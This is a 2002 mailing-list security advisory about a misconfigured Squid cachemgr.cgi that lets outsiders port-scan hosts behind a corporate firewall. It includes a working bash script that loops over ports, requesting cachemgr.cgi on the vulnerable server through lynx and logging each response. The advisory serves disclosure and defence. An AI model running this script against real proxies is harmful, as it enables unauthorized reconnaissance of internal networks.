cachemgr.cgi (squid 2.3STABLE4)

From: Francisco Sáa Muñoz (fsaaat_private)
Date: Mon Feb 04 2002 - 08:43:36 PST

    ]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration

    ]-* [IP6] Configuration error [BID error class]

    ]-* [IP6] Platform investigated: 	Linux Redhat 6.2
    						Squid 2.3STABLE4
    						Apache 1.3.12

    ]-* [IP6] The problem...

    Due to a misconfiguration on Apache and Squid Is posible to use
    cachemgr.cgi shipped with Squid to scan hosts under the corporate firewall.

    ...also we can gater a lot information about the navegation,
    configuration...

    ...also there is a lot code with bad programmer habits!

    There is a lil' script to demonstrate the error, not so clean, but useful.

    --- Begin nasty code miscachemgr.cgi ---
    #!/bin/bash -x

    # Port scanning using a misconfigured squid
    # using open apache

    # Usage miscachemgr host_vuln host_to_scan end_port

    # Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz
    # Coded by Francisco Sáa Muñoz
    # IP6 [Logic Control]

    PORT=1
    ONE='/cgi-bin/cachemgr.cgi?host='
    TWO='&port='
    THREE='&user_name=&operation&auth='

    mkdir from_$1_to_$2

    while [ $PORT -lt $3 ]; do

    # lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
    # $2&port=$PORT&user_name=&operation=authenticate&auth= > \
    # port_$1_to_$2/$PORT.log 2>&1

    lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
    let PORT=PORT+1

    done
    --- End nasty Code ---

    ]-* [IP6] Solution

    Deny access, configure it!

    ]-* [IP6] Thanks

    Thanks to all IP6 staff for the good feeling.

    Signed,

    --
    Francisco Sáa Muñoz :: Nuno Treez \(HLP\)
    Security Consultant/Tiger Team

    ]-* [IP6] EOF